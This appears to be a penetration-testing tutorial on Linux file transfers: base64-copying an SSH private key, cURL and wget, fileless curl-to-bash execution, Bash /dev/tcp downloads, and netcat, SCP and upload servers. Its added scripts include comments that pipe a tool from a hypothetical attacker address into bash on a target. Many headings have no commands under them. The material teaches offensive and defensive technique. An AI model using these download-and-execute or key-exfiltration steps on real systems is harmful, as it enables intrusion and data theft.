Linux File Transfer Methods
Introduction
Linux is a versatile operating system that ships with many tools we can use to transfer files. Understanding these methods helps attackers move tooling onto a target and helps defenders recognise, detect and block the same techniques.
A few years ago, we were contacted to perform incident response on some web servers. We found multiple threat actors in six out of the nine web servers we investigated. The threat actor found a SQL Injection vulnerability. They used a Bash script that, when executed, attempted to download another piece of malware that connected to the threat actor's command and control server.
The Bash script they used tried three download methods to get the other piece of malware that connected to the command and control server. Its first attempt was to use cURL. If that failed, it attempted to use wget, and if that failed, it used Python. All three methods use HTTP to communicate.
Although Linux can also speak FTP and SMB, as Windows does, most malware on every operating system uses HTTP and HTTPS to communicate, because those protocols are the ones most likely to be allowed out through a firewall.
Download Operations
Base64 Encoding / Decoding
For small files, we can use a method that requires no network communication at all. If we have access to a terminal, we encode the file as a base64 string, paste that string into the terminal on the other side, and decode it there.
Check File MD5 Hash:
md5sum id_rsa
# Output: 4e301756a07ded0a2dd6953abf015278 id_rsa
Encode SSH Key to Base64:
cat id_rsa | base64 -w 0; echo
# Output: LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0K...
Decode the File:
Confirm the MD5 Hashes Match:
Note: the same technique works in the upload direction. On the compromised target, base64-encode the file with cat and base64, copy the string, and decode it on your attack machine. Compare the hashes on both ends either way: a single character lost in the paste silently corrupts the file.
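The round trip above as one runnable script, added here as an example and not code from the original page: encode, decode and confirm the hashes match. The file contents and paths are constructed so it runs offline; on a real engagement the encode step runs on one host and the decode step on the other, with the base64 string pasted through the terminal in between.

```shell
#!/bin/bash
# Added example (not from the original page): move a file through a terminal as
# base64 text and confirm it arrived intact. The "private key" is constructed
# random data so the script runs offline.

# Encode a file as a single base64 line. -w 0 (GNU coreutils) disables line
# wrapping so the whole string can be copied from the terminal in one piece.
b64_encode_file() {
    base64 -w 0 < "$1"
}

# Decode a base64 string back into a file on the receiving side.
b64_decode_to_file() {
    printf '%s' "$1" | base64 -d > "$2"
}

# Compare two files by MD5. Prints "match" or "mismatch" and returns non-zero on
# mismatch so the result can gate whatever comes next (chmod 600, ssh -i, ...).
hash_match() {
    local a b
    a=$(md5sum < "$1" | cut -d' ' -f1)
    b=$(md5sum < "$2" | cut -d' ' -f1)
    if [ "$a" = "$b" ]; then
        echo match
    else
        echo mismatch
        return 1
    fi
}

# Full round trip on a constructed file; prints "match" when the decoded copy
# is byte-identical to the original.
b64_roundtrip() {
    local work src dst encoded result
    work=$(mktemp -d)
    src="$work/id_rsa"            # constructed stand-in for a real private key
    dst="$work/id_rsa.decoded"
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        head -c 1200 /dev/urandom | base64 -w 76
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$src"
    encoded=$(b64_encode_file "$src")       # this is the string you would paste
    b64_decode_to_file "$encoded" "$dst"
    result=$(hash_match "$src" "$dst")
    rm -rf "$work"
    echo "$result"
}
```

Some terminals and clipboard tools mangle very long single lines; if a paste fails, encode with `base64 -w 76` instead, since GNU `base64 -d` ignores embedded newlines. The `-w` flag is GNU-specific, so on macOS or BSD targets drop it.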
Web Downloads with Wget and cURL
wget and curl are the two most common command-line utilities for talking to web servers, and at least one of them is installed by default on most Linux distributions.
Download a File Using wget:
Download a File Using cURL:
Common wget Options:
-O - Set output filename
-q - Quiet mode (suppress output)
-c - Continue a partial download
-r - Recursive download
--user-agent - Set a custom User-Agent header
Common cURL Options:
-o - Write output to the named file
-O - Write output to a file named after the remote file
-s - Silent mode
-L - Follow redirects
-k - Allow insecure TLS connections (skips certificate verification, so use it only against infrastructure you control)
Fileless Attacks Using Linux
Because most Linux tools read from standard input and write to standard output, they can be chained with pipes, which lets us replicate fileless operations: the downloaded content is fed straight into an interpreter instead of being written to disk first.
Note: some payloads still touch disk. A payload built on mkfifo, for example, creates a named pipe on the filesystem. Piping a download into an interpreter keeps the script itself off disk, but depending on the payload chosen it may still create temporary files on the OS.
Fileless Download with cURL:
Fileless Download with wget:
Download and Execute Python Script:
Download and Execute Bash Script:
Download with Bash (/dev/tcp)
There may also be situations where none of the well-known file transfer tools are available. As long as Bash 2.04 or later is installed and was compiled with --enable-net-redirections, Bash's built-in /dev/tcp/<host>/<port> redirection (a feature of the shell, not a real device file) can be used for simple file downloads.
Connect to the Target Webserver:
HTTP GET Request:
Print the Response:
Complete Example:
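A complete /dev/tcp download as a function, added here as an example (not code from the original page). It sends the GET, checks the status line, and strips the response headers so only the file body is written to disk. The host, port and path in the usage comment are hypothetical.

```shell
#!/bin/bash
# Added example (not from the original page): minimal HTTP GET over Bash's
# /dev/tcp redirection with a status check and header stripping.

# True when the first line of a saved response is an HTTP 200.
http_ok() {
    head -n 1 "$1" | grep -q '^HTTP/[0-9.]* 200 '
}

# Print only the body of a raw HTTP response read on stdin. The header block
# ends at the first empty line ("\r\n" from a well-behaved server, a bare "\n"
# from a sloppy one); the sed range deletes up to and including that line and
# passes the remaining bytes through unchanged.
http_body() {
    local cr
    cr=$(printf '\r')
    sed "1,/^${cr}*\$/d"
}

# Fetch http://host:port/path into a file using Bash builtins plus sed/head/grep.
# HTTP/1.0 with Connection: close makes the server close the socket after the
# body, so reading to EOF is enough: no Content-Length or chunked parsing needed.
devtcp_get() {
    local host=$1 port=$2 path=$3 out=$4 raw
    raw=$(mktemp) || return 1
    # open a bidirectional TCP connection on file descriptor 3
    exec 3<>"/dev/tcp/$host/$port" || { rm -f "$raw"; return 1; }
    printf 'GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n' "$path" "$host" >&3
    cat <&3 > "$raw"
    exec 3<&-
    if ! http_ok "$raw"; then
        # a 404 body would otherwise be saved as if it were the file
        printf 'unexpected response: %s\n' "$(head -n 1 "$raw" | tr -d '\r')" >&2
        rm -f "$raw"
        return 1
    fi
    http_body < "$raw" > "$out"
    rm -f "$raw"
}

# Usage (hypothetical target and path):
#   devtcp_get 10.10.14.3 8000 /tool.sh /tmp/tool.sh && sha256sum /tmp/tool.sh
```

The response is buffered to a temporary file so the status line can be inspected before anything is written to the destination; for a strictly in-memory variant, read the status line with `read -r` from fd 3 first. Binary downloads pass through sed byte-for-byte on GNU systems, but verify them with a checksum regardless.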
SSH Downloads
SSH (Secure Shell) is a protocol that provides secure access to remote computers. OpenSSH ships with the scp utility, which copies files over an SSH connection, so transfers are encrypted and authenticated by default.
Setup SSH Server (if needed):
Download Files Using SCP:
Download Directory Using SCP:
Using SSH Key Authentication:
Alternative Download Methods
Python Downloads
Perl Downloads
Ruby Downloads
Upload Operations
Web Upload
We can use uploadserver, a Python module that extends http.server with a file upload endpoint. Let's configure it to use HTTPS so the uploaded files travel encrypted.
Install uploadserver:
Create a Self-Signed Certificate:
Start Web Server:
Upload Multiple Files:
Upload Single File:
Alternative Web File Transfer Method
Since Linux distributions usually have Python or PHP installed, starting a web server to transfer files is straightforward.
Create Web Server with Python3:
Create Web Server with Python2.7:
Create Web Server with PHP:
Create Web Server with Ruby:
Download File from Target Machine:
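The serve-and-download workflow above, together with the fileless execution described under "Fileless Attacks Using Linux", as one runnable script. This is an added example, not code from the original page: it starts Python's http.server on the attack side, fetches a file with curl on the target side, refuses to trust the download until its SHA-256 matches, and shows the curl-to-bash variant. Everything binds to 127.0.0.1 and serves a constructed script so it runs offline; the address in the usage comment is hypothetical.

```shell
#!/bin/bash
# Added example (not from the original page): http.server on one side, curl on
# the other, SHA-256 verification in between, plus the fileless variant.

sha256_of() { sha256sum < "$1" | cut -d' ' -f1; }

# Serve $1 on an ephemeral loopback port, logging to $2. Python prints its
# banner only after bind()/listen(), so once the port appears curl can connect.
# Results go in SERVER_PID / SERVER_PORT (globals, because $(...) would run
# this in a subshell and lose the PID we need for cleanup).
start_server() {
    local dir=$1 log=$2 i
    SERVER_PORT=""
    python3 -u -m http.server --bind 127.0.0.1 --directory "$dir" 0 > "$log" 2>&1 &
    SERVER_PID=$!
    for i in 1 2 3 4 5 6 7 8 9 10; do
        SERVER_PORT=$(sed -n 's/.*port \([0-9][0-9]*\) .*/\1/p' "$log" | head -n 1)
        [ -n "$SERVER_PORT" ] && return 0
        sleep 0.5
    done
    return 1
}

stop_server() {
    kill "$SERVER_PID" 2>/dev/null || true
    wait "$SERVER_PID" 2>/dev/null || true
}

# Download one file. -f makes curl fail on an HTTP error instead of saving the
# server's error page under the expected file name.
fetch() {
    curl -sSf -o "$3" "http://127.0.0.1:$1/$2"
}

# Fileless variant: the script is executed from the pipe and never touches disk.
fetch_and_exec() {
    curl -sSf "http://127.0.0.1:$1/$2" | bash
}

# Prints verified/corrupt and fails on mismatch so it can gate the next step.
verify_sha256() {
    if [ "$(sha256_of "$1")" = "$2" ]; then echo verified; else echo corrupt; return 1; fi
}

# Constructed payload directory; prints its path.
make_payload_dir() {
    local dir
    dir=$(mktemp -d)
    printf '#!/bin/bash\necho "constructed payload ran"\n' > "$dir/tool.sh"
    echo "$dir"
}

# End-to-end download with verification; prints "verified".
demo_download() {
    local dir log dest expected result
    dir=$(make_payload_dir); log=$(mktemp); dest=$(mktemp)
    expected=$(sha256_of "$dir/tool.sh")      # hash recorded on the attack side
    start_server "$dir" "$log" || { stop_server; return 1; }
    fetch "$SERVER_PORT" tool.sh "$dest"
    stop_server
    result=$(verify_sha256 "$dest" "$expected")
    rm -rf "$dir" "$log" "$dest"
    echo "$result"
}

# End-to-end fileless execution; prints the payload's output.
demo_fileless() {
    local dir log out
    dir=$(make_payload_dir); log=$(mktemp)
    start_server "$dir" "$log" || { stop_server; return 1; }
    out=$(fetch_and_exec "$SERVER_PORT" tool.sh)
    stop_server
    rm -rf "$dir" "$log"
    echo "$out"
}

# Across a real network (hypothetical attacker address 10.10.14.3):
#   attacker$ python3 -m http.server 8000           # serves the current directory on 0.0.0.0
#   attacker$ sha256sum tool.sh                     # record the hash you expect
#   target$   curl -sSf -o /tmp/tool.sh http://10.10.14.3:8000/tool.sh
#   target$   sha256sum /tmp/tool.sh                # compare before running it
#   target$   curl -sSf http://10.10.14.3:8000/tool.sh | bash    # fileless variant
```

Note that the fileless variant gives up the integrity check: whatever the server (or anything on the path) returns is executed as-is, which is exactly why the note under "Fileless Attacks Using Linux" matters from the defender's side and why HTTPS is preferable when the payload matters.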
SCP Upload
Some companies allow the SSH protocol (TCP/22) for outbound connections. If that's the case, we can run an SSH server on our attack host and use the scp utility on the target to upload files to it.
Upload File using SCP:
Upload Directory using SCP:
Upload with SSH Key:
SFTP (SSH File Transfer Protocol)
SFTP provides a secure way to transfer files and can be used interactively or in batch mode.
Interactive SFTP Session:
Batch SFTP Operations:
Netcat File Transfer
Netcat can be used for simple file transfers when other methods are not available.
Setup Netcat Listener (Receiving End):
Send File via Netcat:
Transfer with Progress (using pv):
Rsync File Transfer
Rsync is a powerful tool for synchronizing files and directories locally or over a network.
Basic Rsync Usage:
Rsync over SSH:
Rsync with Progress:
Common Rsync Options:
-a - Archive mode (recursive; preserves permissions, timestamps, symlinks, etc.)
-v - Verbose output
-z - Compress data during transfer
-r - Recursive (already implied by -a)
--delete - Delete files in the destination that are not present in the source
--exclude - Exclude files matching a pattern
Advanced Techniques
Using Socat for File Transfer
Socat is a more capable relative of netcat: it relays between two arbitrary addresses (TCP, UDP, Unix sockets, files, processes) and can wrap a connection in TLS.
Setup Socat Listener:
Send File via Socat:
FTP File Transfer
FTP can be used when an FTP service is reachable and the protocol is allowed through the firewall. Keep in mind that plain FTP sends credentials and file contents in cleartext.
Interactive FTP Session:
Automated FTP with Script:
Using Git for File Transfer
Git can be used as an unconventional file transfer method when available.
Clone Repository:
Create and Push Files:
Security Considerations
Encrypted File Transfer
Always prefer encrypted methods when possible:
HTTPS over HTTP:
SCP/SFTP over FTP:
SSH Tunneling:
File Integrity Verification
Always verify file integrity after transfer:
MD5 Checksums:
SHA256 Checksums:
Compare Checksums:
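The single-file hash comparison above extended to a whole batch, added here as an example (not code from the original page): the sender produces a SHA-256 manifest, the receiver verifies every file against it with sha256sum -c and learns which file, if any, was altered or lost in transit. File names and contents are constructed so the script runs offline.

```shell
#!/bin/bash
# Added example (not from the original page): manifest-based integrity check
# for a batch of transferred files.

# Sender: one "hash  ./name" line per file. The manifest is written outside the
# directory so it never lists itself; pass an absolute path (mktemp gives one).
make_manifest() {
    local dir=$1 manifest=$2
    (cd "$dir" && sha256sum ./*) > "$manifest"
}

# Receiver: check every entry and print the names that fail, one per line.
# sha256sum -c --quiet reports only failures, including files that are missing
# ("FAILED open or read"), so both tampering and partial transfers show up.
verify_manifest() {
    local dir=$1 manifest=$2 failed
    failed=$( (cd "$dir" && sha256sum -c --quiet "$manifest" 2>/dev/null) \
              | sed -n 's/: FAILED.*$//p')
    [ -z "$failed" ] && return 0
    printf '%s\n' "$failed"
    return 1
}

# Constructed sender directory plus its manifest; prints "dir manifest".
setup() {
    local send manifest
    send=$(mktemp -d); manifest=$(mktemp)
    printf 'echo hi\n' > "$send/tool.sh"
    printf 'user=admin\n' > "$send/app.conf"
    make_manifest "$send" "$manifest"
    echo "$send $manifest"
}

# Clean transfer: verification prints nothing, so the function prints "ok".
demo_clean() {
    local send manifest recv
    set -- $(setup); send=$1; manifest=$2
    recv=$(mktemp -d); cp "$send"/* "$recv"/          # stands in for scp/curl/nc
    verify_manifest "$recv" "$manifest" && echo ok
    rm -rf "$send" "$recv" "$manifest"
}

# Tampered transfer: one file modified on the way; prints "./tool.sh".
demo_tampered() {
    local send manifest recv
    set -- $(setup); send=$1; manifest=$2
    recv=$(mktemp -d); cp "$send"/* "$recv"/
    printf 'echo pwned\n' > "$recv/tool.sh"            # modified in transit
    verify_manifest "$recv" "$manifest" || true
    rm -rf "$send" "$recv" "$manifest"
}
```

Send the manifest over a channel you trust more than the bulk transfer (or at least a separate one); a manifest that travels next to the files it describes only detects accidental corruption, not an attacker who can rewrite both.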
Key Takeaways
Multiple methods available - Linux provides many built-in tools for file transfer
Fileless operations - Downloaded scripts can be piped straight into an interpreter without being written to disk
Base64 encoding - Useful for small files and restricted environments
HTTP/HTTPS preferred - The protocols most commonly allowed through firewalls, which is also why most malware uses them
SSH/SCP - Secure and widely supported for encrypted transfers
Netcat versatility - Simple but powerful for basic transfers
Always verify integrity - Use checksums to ensure successful transfers
Consider security - Prefer encrypted methods when possible